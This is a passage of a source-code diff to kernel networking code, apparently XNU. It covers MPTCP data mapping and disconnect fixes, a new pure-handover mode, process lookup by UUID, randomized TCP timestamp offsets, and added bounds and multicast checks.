                                }
 
                                break;
@@ -2232,13 +2327,14 @@ fallback:
 
                        if (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) {
                                dfin = 1;
+                               dlen--;
                        }
                }
 
                /*
                 * Check if the full mapping is now present
                 */
-               if ((int)so->so_rcv.sb_cc < dlen - dfin) {
+               if ((int)so->so_rcv.sb_cc < dlen) {
                        if (*mp0 == NULL) {
                                error = EWOULDBLOCK;
                        }
@@ -2246,8 +2342,9 @@ fallback:
                }
 
                /* Now, get the full mapping */
+               off = 0;
                while (dlen > 0) {
-                       if (mptcp_adj_rmap(so, m, orig_dlen - dlen, dsn, sseq, orig_dlen)) {
+                       if (mptcp_adj_rmap(so, m, off, dsn, sseq, orig_dlen, dfin)) {
                                error_out = 1;
                                error = EIO;
                                dlen = 0;
@@ -2256,6 +2353,7 @@ fallback:
                        }
 
                        dlen -= m->m_len;
+                       off += m->m_len;
                        sbfree(&so->so_rcv, m);
 
                        if (mp != NULL) {
@@ -2265,11 +2363,7 @@ fallback:
                                *mp = NULL;
                        }
 
-                       if (dlen - dfin == 0) {
-                               dlen = 0;
-                       }
-
-                       VERIFY(dlen <= 0 || m);
+                       VERIFY(dlen == 0 || m);
                }
 
                VERIFY(dlen == 0);
@@ -2745,6 +2839,23 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts)
                send_dfin = 1;
        }
 
+       if (mp_so->so_flags & SOF_DEFUNCT) {
+               errno_t ret;
+
+               ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE);
+               if (ret == 0) {
+                       ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
+
+                       if (ret != 0) {
+                               os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n",
+                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
+                       }
+               } else {
+                       os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
+               }
+       }
+
        if (!(so->so_state & (SS_ISDISCONNECTING | SS_ISDISCONNECTED)) &&
            (so->so_state & SS_ISCONNECTED)) {
                mptcplog((LOG_DEBUG, "%s: cid %d fin %d\n",
@@ -2755,26 +2866,9 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts)
                        mptcp_send_dfin(so);
                }
 
-               if (mp_so->so_flags & SOF_DEFUNCT) {
-                       errno_t ret;
-
-                       ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE);
-                       if (ret == 0) {
-                               ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
-
-                               if (ret != 0) {
-                                       os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n",
-                                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
-                               }
-                       } else {
-                               os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n",
-                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
-                       }
-               } else {
-                       (void) soshutdownlock(so, SHUT_RD);
-                       (void) soshutdownlock(so, SHUT_WR);
-                       (void) sodisconnectlocked(so);
-               }
+               (void) soshutdownlock(so, SHUT_RD);
+               (void) soshutdownlock(so, SHUT_WR);
+               (void) sodisconnectlocked(so);
        }
 
        /*
@@ -3350,6 +3444,9 @@ done_sending:
                 */
                error = 0;
        } else {
+               /* We need to revert our change to mpts_rel_seq */
+               mpts->mpts_rel_seq -= tot_sent;
+
                os_log_error(mptcp_log_handle, "%s - %lx: %u error %d len %d subflags %#x sostate %#x soerror %u hiwat %u lowat %u\n",
                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), mpts->mpts_connid, error, tot_sent, so->so_flags, so->so_state, so->so_error, so->so_snd.sb_hiwat, so->so_snd.sb_lowat);
        }
@@ -3399,9 +3496,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
                /* m is already fully covered by the next mbuf in the queue */
                if (n->m_pkthdr.mp_dsn == m->m_pkthdr.mp_dsn &&
                    n->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_rlen) {
-                       mptcplog((LOG_DEBUG, "%s fully covered with len %u\n",
-                           __func__, n->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: dsn %u dlen %u rseq %u fully covered with len %u\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
+                           m->m_pkthdr.mp_rseq, n->m_pkthdr.mp_rlen);
                        goto dont_queue;
                }
 
@@ -3409,10 +3507,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
                if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen >= n->m_pkthdr.mp_dsn + n->m_pkthdr.mp_rlen) {
                        struct mbuf *tmp = n->m_nextpkt;
 
-                       mptcplog((LOG_DEBUG, "%s m is covering that guy dsn %u len %u dsn %u len %u\n",
-                           __func__, (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
-                           (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: m (dsn %u len %u) is covering existing mbuf (dsn %u len %u)\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
+                           (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen);
 
                        m->m_nextpkt = NULL;
                        if (prev == NULL) {
@@ -3429,9 +3527,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
        if (prev) {
                /* m is already fully covered by the previous mbuf in the queue */
                if (prev->m_pkthdr.mp_dsn + prev->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_dsn + m->m_pkthdr.len) {
-                       mptcplog((LOG_DEBUG, "%s prev covers us from %u with len %u\n",
-                           __func__, (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: prev (dsn %u len %u) covers us (dsn %u len %u)\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen,
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen);
                        goto dont_queue;
                }
        }
@@ -3547,6 +3646,7 @@ mptcp_reinject_mbufs(struct socket *so)
        m = sb->sb_mb;
        while (m) {
                struct mbuf *n = m->m_next, *orig = m;
+               bool set_reinject_flag = false;
 
                mptcplog((LOG_DEBUG, "%s working on suna %u relseq %u iss %u len %u pktflags %#x\n",
                    __func__, tp->snd_una, m->m_pkthdr.mp_rseq, mpts->mpts_iss,
@@ -3587,6 +3687,7 @@ mptcp_reinject_mbufs(struct socket *so)
                 */
                mptcp_add_reinjectq(mpte, m);
 
+               set_reinject_flag = true;
                orig->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
 
 next:
@@ -3598,7 +3699,9 @@ next:
                                break;
                        }
 
-                       n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
+                       if (set_reinject_flag) {
+                               n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
+                       }
                        n = n->m_next;
                }
 
@@ -3969,11 +4072,9 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts)
        ifp = sotoinpcb(so)->inp_last_outifp;
 
        if (ifnet_get_nat64prefix(ifp, nat64prefixes) == ENOENT) {
-               mptcp_ask_for_nat64(ifp);
                return;
        }
 
-
        for (j = 0; j < NAT64_MAX_NUM_PREFIXES; j++) {
                int success;
 
@@ -3983,11 +4084,11 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts)
 
                success = mptcp_desynthesize_ipv6_addr(&mpte->__mpte_dst_v6.sin6_addr,
                    &nat64prefixes[j],
-                   &mpte->mpte_dst_v4_nat64.sin_addr);
+                   &mpte->mpte_sub_dst_v4.sin_addr);
                if (success) {
-                       mpte->mpte_dst_v4_nat64.sin_len = sizeof(mpte->mpte_dst_v4_nat64);
-                       mpte->mpte_dst_v4_nat64.sin_family = AF_INET;
-                       mpte->mpte_dst_v4_nat64.sin_port = mpte->__mpte_dst_v6.sin6_port;
+                       mpte->mpte_sub_dst_v4.sin_len = sizeof(mpte->mpte_sub_dst_v4);
+                       mpte->mpte_sub_dst_v4.sin_family = AF_INET;
+                       mpte->mpte_sub_dst_v4.sin_port = mpte->__mpte_dst_v6.sin6_port;
                        break;
                }
        }
@@ -4151,7 +4252,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts,
                        mptcp_notify_mpfail(so);
                } else {
                        if (IFNET_IS_CELLULAR(inp->inp_last_outifp) &&
-                           mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+                           mptcp_subflows_need_backup_flag(mpte)) {
                                tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO);
                        } else {
                                mpts->mpts_flags |= MPTSF_PREFERRED;
@@ -4186,7 +4287,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts,
                 */
                if (IFNET_IS_CELLULAR(inp->inp_last_outifp) &&
                    !(tp->t_mpflags & TMPF_BACKUP_PATH) &&
-                   mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+                   mptcp_subflows_need_backup_flag(mpte)) {
                        tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO);
                        mpts->mpts_flags &= ~MPTSF_PREFERRED;
                } else {
@@ -6276,6 +6377,7 @@ mptcp_wifi_status_changed(void)
 
                /* Only handover- and urgency-mode are purely driven by Symptom's Wi-Fi status */
                if (mpte->mpte_svctype != MPTCP_SVCTYPE_HANDOVER &&
+                   mpte->mpte_svctype != MPTCP_SVCTYPE_PURE_HANDOVER &&
                    mpte->mpte_svctype != MPTCP_SVCTYPE_TARGET_BASED) {
                        goto next;
                }
@@ -6290,12 +6392,68 @@ next:
        lck_mtx_unlock(&mtcbinfo.mppi_lock);
 }
 
+struct mptcp_uuid_search_info {
+       uuid_t target_uuid;
+       proc_t found_proc;
+       boolean_t is_proc_found;
+};
+
+static int
+mptcp_find_proc_filter(proc_t p, void *arg)
+{
+       struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg;
+       int found;
+
+       if (info->is_proc_found) {
+               return 0;
+       }
+
+       /*
+        * uuid_compare returns 0 if the uuids are matching, but the proc-filter
+        * expects != 0 for a matching filter.
+        */
+       found = uuid_compare(p->p_uuid, info->target_uuid) == 0;
+       if (found) {
+               info->is_proc_found = true;
+       }
+
+       return found;
+}
+
+static int
+mptcp_find_proc_callout(proc_t p, void * arg)
+{
+       struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg;
+
+       if (uuid_compare(p->p_uuid, info->target_uuid) == 0) {
+               info->found_proc = p;
+               return PROC_CLAIMED_DONE;
+       }
+
+       return PROC_RETURNED;
+}
+
+static proc_t
+mptcp_find_proc(const uuid_t uuid)
+{
+       struct mptcp_uuid_search_info info;
+
+       uuid_copy(info.target_uuid, uuid);
+       info.found_proc = PROC_NULL;
+       info.is_proc_found = false;
+
+       proc_iterate(PROC_ALLPROCLIST, mptcp_find_proc_callout, &info,
+           mptcp_find_proc_filter, &info);
+
+       return info.found_proc;
+}
+
 void
 mptcp_ask_symptoms(struct mptses *mpte)
 {
        struct mptcp_symptoms_ask_uuid ask;
        struct socket *mp_so;
-       struct proc *p;
+       struct proc *p = PROC_NULL;
        int pid, prio, err;
 
        if (mptcp_kern_skt_unit == 0) {
@@ -6307,26 +6465,50 @@ mptcp_ask_symptoms(struct mptses *mpte)
        mp_so = mptetoso(mpte);
 
        if (mp_so->so_flags & SOF_DELEGATED) {
-               pid = mp_so->e_pid;
-       } else {
-               pid = mp_so->last_pid;
-       }
+               if (mpte->mpte_epid != 0) {
+                       p = proc_find(mpte->mpte_epid);
+                       if (p != PROC_NULL) {
+                               /* We found a pid, check its UUID */
+                               if (uuid_compare(mp_so->e_uuid, p->p_uuid)) {
+                                       /* It's not the same - we need to look for the real proc */
+                                       proc_rele(p);
+                                       p = PROC_NULL;
+                               }
+                       }
+               }
 
-       p = proc_find(pid);
-       if (p == PROC_NULL) {
-               os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n",
-                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid);
-               return;
-       }
+               if (p == PROC_NULL) {
+                       p = mptcp_find_proc(mp_so->e_uuid);
+                       if (p == PROC_NULL) {
+                               uuid_string_t uuid_string;
+                               uuid_unparse(mp_so->e_uuid, uuid_string);
 
-       ask.cmd = MPTCP_SYMPTOMS_ASK_UUID;
+                               os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for uuid %s\n",
+                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), uuid_string);
 
-       if (mp_so->so_flags & SOF_DELEGATED) {
+                               return;
+                       }
+                       mpte->mpte_epid = proc_pid(p);
+               }
+
+               pid = mpte->mpte_epid;
                uuid_copy(ask.uuid, mp_so->e_uuid);
        } else {
+               pid = mp_so->last_pid;
+
+               p = proc_find(pid);
+               if (p == PROC_NULL) {
+                       os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid);
+                       return;
+               }
+
                uuid_copy(ask.uuid, mp_so->last_uuid);
        }
 
+
+       ask.cmd = MPTCP_SYMPTOMS_ASK_UUID;
+
        prio = proc_get_effective_task_policy(proc_task(p), TASK_POLICY_ROLE);
 
        if (prio == TASK_BACKGROUND_APPLICATION || prio == TASK_NONUI_APPLICATION ||
index ff16b486f8468a8e7f07a85194eddb7e2c9c83d4..533b1ac3087dfb7109f4e9f5e8587df9cecf68d7 100644 (file)
@@ -109,6 +109,10 @@ int mptcp_developer_mode = 0;
 SYSCTL_INT(_net_inet_mptcp, OID_AUTO, allow_aggregate, CTLFLAG_RW | CTLFLAG_LOCKED,
     &mptcp_developer_mode, 0, "Allow the Multipath aggregation mode");
 
+int mptcp_no_first_party = 0;
+SYSCTL_INT(_net_inet_mptcp, OID_AUTO, no_first_party, CTLFLAG_RW | CTLFLAG_LOCKED,
+    &mptcp_no_first_party, 0, "Do not do first-party app exemptions");
+
 static unsigned long mptcp_expected_progress_headstart = 5000;
 SYSCTL_ULONG(_net_inet_mptcp, OID_AUTO, expected_progress_headstart, CTLFLAG_RW | CTLFLAG_LOCKED,
     &mptcp_expected_progress_headstart, "Headstart to give MPTCP before meeting the progress deadline");
@@ -222,6 +226,10 @@ mptcp_entitlement_check(struct socket *mp_so, uint8_t svctype)
 {
        struct mptses *mpte = mpsotompte(mp_so);
 
+       if (mptcp_no_first_party) {
+               return 0;
+       }
+
        /* First, check for mptcp_extended without delegation */
        if (soopt_cred_check(mp_so, PRIV_NET_RESTRICTED_MULTIPATH_EXTENDED, TRUE, FALSE) == 0) {
                /*
@@ -341,6 +349,12 @@ mptcp_usr_connectx(struct socket *mp_so, struct sockaddr *src,
 
        if ((mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING)) == 0) {
                memcpy(&mpte->mpte_u_dst, dst, dst->sa_len);
+
+               if (dst->sa_family == AF_INET) {
+                       memcpy(&mpte->mpte_sub_dst_v4, dst, dst->sa_len);
+               } else {
+                       memcpy(&mpte->mpte_sub_dst_v6, dst, dst->sa_len);
+               }
        }
 
        if (src) {
@@ -887,7 +901,7 @@ mptcp_disconnect(struct mptses *mpte)
            struct socket *, mp_so, struct mptcb *, mp_tp);
 
        /* if we're not detached, go thru socket state checks */
-       if (!(mp_so->so_flags & SOF_PCBCLEARING)) {
+       if (!(mp_so->so_flags & SOF_PCBCLEARING) && !(mp_so->so_flags & SOF_DEFUNCT)) {
                if (!(mp_so->so_state & (SS_ISCONNECTED |
                    SS_ISCONNECTING))) {
                        error = ENOTCONN;
@@ -953,7 +967,7 @@ mptcp_finish_usrclosed(struct mptses *mpte)
        struct mptcb *mp_tp = mpte->mpte_mptcb;
        struct socket *mp_so = mptetoso(mpte);
 
-       if (mp_tp->mpt_state == MPTCPS_CLOSED) {
+       if (mp_tp->mpt_state == MPTCPS_CLOSED || mp_tp->mpt_state == MPTCPS_TERMINATE) {
                mpte = mptcp_close(mpte, mp_tp);
        } else if (mp_tp->mpt_state >= MPTCPS_FIN_WAIT_2) {
                soisdisconnected(mp_so);
@@ -982,7 +996,8 @@ mptcp_usrclosed(struct mptses *mpte)
        mptcp_close_fsm(mp_tp, MPCE_CLOSE);
 
        /* Not everything has been acknowledged - don't close the subflows! */
-       if (mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) {
+       if (mp_tp->mpt_state != MPTCPS_TERMINATE &&
+           mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) {
                return mpte;
        }
 
@@ -1648,6 +1663,7 @@ mptcp_setopt(struct mptses *mpte, struct sockopt *sopt)
                case PERSIST_TIMEOUT:
                case TCP_ADAPTIVE_READ_TIMEOUT:
                case TCP_ADAPTIVE_WRITE_TIMEOUT:
+               case TCP_FASTOPEN_FORCE_ENABLE:
                        /* eligible; record it */
                        break;
                case TCP_NOTSENT_LOWAT:
@@ -2011,6 +2027,7 @@ mptcp_getopt(struct mptses *mpte, struct sockopt *sopt)
        case TCP_RXT_CONNDROPTIME:
        case TCP_ADAPTIVE_READ_TIMEOUT:
        case TCP_ADAPTIVE_WRITE_TIMEOUT:
+       case TCP_FASTOPEN_FORCE_ENABLE:
        {
                struct mptopt *mpo = mptcp_sopt_find(mpte, sopt);
 
@@ -2213,6 +2230,8 @@ mptcp_sopt2str(int level, int optname)
                        return "ADAPTIVE_READ_TIMEOUT";
                case TCP_ADAPTIVE_WRITE_TIMEOUT:
                        return "ADAPTIVE_WRITE_TIMEOUT";
+               case TCP_FASTOPEN_FORCE_ENABLE:
+                       return "TCP_FASTOPEN_FORCE_ENABLE";
                case MPTCP_SERVICE_TYPE:
                        return "MPTCP_SERVICE_TYPE";
                case MPTCP_ALTERNATE_PORT:
index cc16b1c705ae140fa65f1fed052f9e736ef989cb..17aa71b7817f6a0a995df971a46c23490c7e072b 100644 (file)
@@ -93,10 +93,8 @@ struct mptses {
 #define __mpte_dst_v4 mpte_u_dst._mpte_dst_v4
 #define __mpte_dst_v6 mpte_u_dst._mpte_dst_v6
 
-       struct sockaddr_in mpte_dst_v4_nat64;
-
-       struct sockaddr_in mpte_dst_unicast_v4;
-       struct sockaddr_in6 mpte_dst_unicast_v6;
+       struct sockaddr_in      mpte_sub_dst_v4;
+       struct sockaddr_in6     mpte_sub_dst_v6;
 
        uint16_t        mpte_alternate_port;    /* Alternate port for subflow establishment (network-byte-order) */
 
@@ -205,6 +203,12 @@ mptcp_subflow_cwnd_space(struct socket *so)
        return MIN(cwnd, sbspace(&so->so_snd));
 }
 
+static inline bool
+mptcp_subflows_need_backup_flag(struct mptses *mpte)
+{
+       return mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE ||
+              mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER;
+}
 
 /*
  * MPTCP socket options
@@ -639,7 +643,6 @@ extern void mptcp_ask_symptoms(struct mptses *mpte);
 extern void mptcp_control_register(void);
 extern int mptcp_is_wifi_unusable_for_session(struct mptses *mpte);
 extern boolean_t symptoms_is_wifi_lossy(void);
-extern void mptcp_ask_for_nat64(struct ifnet *ifp);
 extern void mptcp_session_necp_cb(void *, int, uint32_t, uint32_t, bool *);
 extern struct sockaddr *mptcp_get_session_dst(struct mptses *mpte,
     boolean_t has_v6, boolean_t has_v4);
index a140e89253d546f4543a4f27de7168d4b4691e89..2975ccff192821e5c165668226c4ddc267328104 100644 (file)
@@ -934,6 +934,9 @@ rip_attach(struct socket *so, int proto, struct proc *p)
        if ((so->so_state & SS_PRIV) == 0) {
                return EPERM;
        }
+       if (proto > UINT8_MAX) {
+               return EINVAL;
+       }
 
        error = soreserve(so, rip_sendspace, rip_recvspace);
        if (error) {
index b63fc818bc5bacbb8acf16a21eda8e71662492e1..3021fb0b5b5d8291b8e5a98c2bae77b9c7cbc3d7 100644 (file)
@@ -293,7 +293,9 @@ struct tcp_notify_ack_complete {
 #define MPTCP_SVCTYPE_INTERACTIVE       1
 #define MPTCP_SVCTYPE_AGGREGATE         2
 #define MPTCP_SVCTYPE_TARGET_BASED      3
-#define MPTCP_SVCTYPE_MAX               4
+#define MPTCP_SVCTYPE_PURE_HANDOVER     4
+#define MPTCP_SVCTYPE_MAX               5
+
 /*
  * Specify minimum time in seconds before which an established
  * TCP connection will not be dropped when there is no response from the
@@ -322,10 +324,15 @@ struct tcp_notify_ack_complete {
 #define TCPI_FLAG_STREAMING_ON  0x02    /* Streaming detection on */
 
 struct tcp_conn_status {
-       unsigned int    probe_activated : 1;
-       unsigned int    write_probe_failed : 1;
-       unsigned int    read_probe_failed : 1;
-       unsigned int    conn_probe_failed : 1;
+       union {
+               struct {
+                       unsigned int    probe_activated : 1;
+                       unsigned int    write_probe_failed : 1;
+                       unsigned int    read_probe_failed : 1;
+                       unsigned int    conn_probe_failed : 1;
+               };
+               uint32_t        pad_field;
+       };
 };
 
 /*
index bb33ba1acf0b41b2e40bf929d6fa70eb48ce1a38..d91a93a61fbede696c07135c557c79bd994dfafd 100644 (file)
@@ -2237,6 +2237,11 @@ findpcb:
                goto dropwithreset;
        }
 
+       /* Now that we found the tcpcb, we can adjust the TCP timestamp */
+       if (to.to_flags & TOF_TS) {
+               to.to_tsecr -= tp->t_ts_offset;
+       }
+
        TCP_LOG_TH_FLAGS(TCP_LOG_HDR, th, tp, false, ifp);
 
        if (tp->t_state == TCPS_CLOSED) {
@@ -2889,7 +2894,8 @@ findpcb:
         * be TH_NEEDSYN.
         */
        if (tp->t_state == TCPS_ESTABLISHED &&
-           (thflags & (TH_SYN | TH_FIN | TH_RST | TH_URG | TH_ACK | TH_ECE | TH_CWR)) == TH_ACK &&
+           !(so->so_state & SS_CANTRCVMORE) &&
+           (thflags & TH_FLAGS) == TH_ACK &&
            ((tp->t_flags & TF_NEEDFIN) == 0) &&
            ((to.to_flags & TOF_TS) == 0 ||
            TSTMP_GEQ(to.to_tsval, tp->ts_recent)) &&
@@ -3066,11 +3072,6 @@ findpcb:
                        so_recv_data_stat(so, m, 0);
                        m_adj(m, drop_hdrlen);  /* delayed header drop */
 
-                       /*
-                        * If message delivery (SOF_ENABLE_MSGS) is enabled on
-                        * this socket, deliver the packet received as an
-                        * in-order message with sequence number attached to it.
-                        */
                        if (isipv6) {
                                memcpy(&saved_hdr, ip6, sizeof(struct ip6_hdr));
                                ip6 = (struct ip6_hdr *)&saved_hdr[0];
@@ -3929,6 +3930,11 @@ close:
                        close_it = TRUE;
                }
 
+               if (so->so_state & SS_CANTRCVMORE) {
+                       TCP_LOG_DROP_PCB(TCP_LOG_HDR, th, tp, false, "SS_CANTRCVMORE");
+                       close_it = TRUE;
+               }
+
                if (close_it) {
                        tp = tcp_close(tp);
                        tcpstat.tcps_rcvafterclose++;
@@ -5165,6 +5171,11 @@ dodata:
                    (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) &&
                    (m->m_pkthdr.pkt_flags & PKTF_MPTCP)) {
                        m_adj(m, drop_hdrlen);  /* delayed header drop */
+                       /*
+                        * 0-length DATA_FIN. The rlen is actually 0. We special-case the
+                        * byte consumed by the dfin in mptcp_input and mptcp_reass_present
+                        */
+                       m->m_pkthdr.mp_rlen = 0;
                        mptcp_input(tptomptp(tp)->mpt_mpte, m);
                        tp->t_flags |= TF_ACKNOW;
                } else {
@@ -5457,6 +5468,7 @@ tcp_dooptions(struct tcpcb *tp, u_char *cp, int cnt, struct tcphdr *th,
                        bcopy((char *)cp + 6,
                            (char *)&to->to_tsecr, sizeof(to->to_tsecr));
                        NTOHL(to->to_tsecr);
+                       to->to_tsecr -= tp->t_ts_offset;
                        /* Re-enable sending Timestamps if we received them */
                        if (!(tp->t_flags & TF_REQ_TSTMP)) {
                                tp->t_flags |= TF_REQ_TSTMP;
index 84fe091ccec8c585712c7a74fb687d2ea2f112c0..5eecbbbf5e3b1f37b723fdbba6542a19d940ea06 100644 (file)
@@ -155,6 +155,10 @@ SYSCTL_SKMEM_TCP_INT(OID_AUTO, ack_compression_rate,
     CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_ack_compression_rate, TCP_COMP_CHANGE_RATE,
     "Rate at which we force sending new ACKs (in ms)");
 
+SYSCTL_SKMEM_TCP_INT(OID_AUTO, randomize_timestamps,
+    CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_randomize_timestamps, 1,
+    "Randomize TCP timestamps to prevent tracking (on: 1, off: 0)");
+
 static int
 sysctl_change_ecn_setting SYSCTL_HANDLER_ARGS
 {
@@ -1636,7 +1640,7 @@ send:
 
                /* Form timestamp option as shown in appendix A of RFC 1323. */
                *lp++ = htonl(TCPOPT_TSTAMP_HDR);
-               *lp++ = htonl(tcp_now);
+               *lp++ = htonl(tcp_now + tp->t_ts_offset);
                *lp   = htonl(tp->ts_recent);
                optlen += TCPOLEN_TSTAMP_APPA;
        }
@@ -2814,9 +2818,9 @@ out:
                }
                /*
                 * Unless this is due to interface restriction policy,
-                * treat EHOSTUNREACH/ENETDOWN as a soft error.
+                * treat EHOSTUNREACH/ENETDOWN/EADDRNOTAVAIL as a soft error.
                 */
-               if ((error == EHOSTUNREACH || error == ENETDOWN) &&
+               if ((error == EHOSTUNREACH || error == ENETDOWN || error == EADDRNOTAVAIL) &&
                    TCPS_HAVERCVDSYN(tp->t_state) &&
                    !inp_restricted_send(inp, inp->inp_last_outifp)) {
                        tp->t_softerror = error;
index fe3a0192ad282fe007097ecb7eb7fbe9e34f062d..0b2a5513833ed0c4d762441c0b09c047b6c122ee 100644 (file)
@@ -1032,6 +1032,7 @@ tcp_newtcpcb(struct inpcb *inp)
        struct tcpcb *tp;
        struct socket *so = inp->inp_socket;
        int isipv6 = (inp->inp_vflag & INP_IPV6) != 0;
+       uint32_t random_32;
 
        calculate_tcp_clock();
 
@@ -1104,14 +1105,19 @@ tcp_newtcpcb(struct inpcb *inp)
        tp->t_twentry.tqe_next = NULL;
        tp->t_twentry.tqe_prev = NULL;
 
+       read_frandom(&random_32, sizeof(random_32));
        if (__probable(tcp_do_ack_compression)) {
-               read_frandom(&tp->t_comp_gencnt, sizeof(tp->t_comp_gencnt));
+               tp->t_comp_gencnt = random_32;
                if (tp->t_comp_gencnt <= TCP_ACK_COMPRESSION_DUMMY) {
                        tp->t_comp_gencnt = TCP_ACK_COMPRESSION_DUMMY + 1;
                }
                tp->t_comp_lastinc = tcp_now;
        }
 
+       if (__probable(tcp_randomize_timestamps)) {
+               tp->t_ts_offset = random_32;
+       }
+
        /*
         * IPv4 TTL initialization is necessary for an IPv6 socket as well,
         * because the socket may be bound to an IPv6 wildcard address,
index 5012199aa4b70c2603795edecb656cb294d1fd97..2070bab17f34fa4150e5666cb6621908e66fe947 100644 (file)
@@ -1052,7 +1052,8 @@ retransmit_packet:
                    (so->so_flags & SOF_MP_SUBFLOW)) {
                        struct mptses *mpte = tptomptp(tp)->mpt_mpte;
 
-                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+                           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                                mptcp_check_subflows_and_add(mpte);
                        }
                }
index fca0d56a6d27855550e7b22fb2602f2c13f3bd4b..861c9f71da92bd040980b634d88f920f44d446d2 100644 (file)
@@ -685,10 +685,18 @@ tcp6_usr_connect(struct socket *so, struct sockaddr *nam, struct proc *p)
                struct sockaddr_in sin;
 
                if ((inp->inp_flags & IN6P_IPV6_V6ONLY) != 0) {
-                       return EINVAL;
+                       error = EINVAL;
+                       goto out;
                }
 
                in6_sin6_2_sin(&sin, sin6p);
+               /*
+                * Must disallow TCP ``connections'' to multicast addresses.
+                */
+               if (IN_MULTICAST(ntohl(sin.sin_addr.s_addr))) {
+                       error = EAFNOSUPPORT;
+                       goto out;
+               }
                inp->inp_vflag |= INP_IPV4;
                inp->inp_vflag &= ~INP_IPV6;
                if ((error = tcp_connect(tp, (struct sockaddr *)&sin, p)) != 0) {
index 3a93146aeaa466b5363b442b0af2fc643256c978..b332da0957430ce25d3c7763d7de86fe1710ff4a 100644 (file)
@@ -69,6 +69,9 @@
 #include <netinet/in_pcb.h>
 #include <netinet/tcp.h>
 #include <netinet/tcp_timer.h>
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 #if defined(__LP64__)
 #define _TCPCB_PTR(x)                   u_int32_t
@@ -642,6 +645,8 @@ struct tcpcb {
        uint32_t        t_comp_lastinc; /* Last time the gen-count was changed - should change every TCP_COMP_CHANGE_RATE ms */
 #define TCP_COMP_CHANGE_RATE    5 /* Intervals at which we change the gencnt. Means that worst-case we send one ACK every TCP_COMP_CHANGE_RATE ms */
 
+       uint32_t        t_ts_offset; /* Randomized timestamp offset to hide on-the-wire timestamp */
+
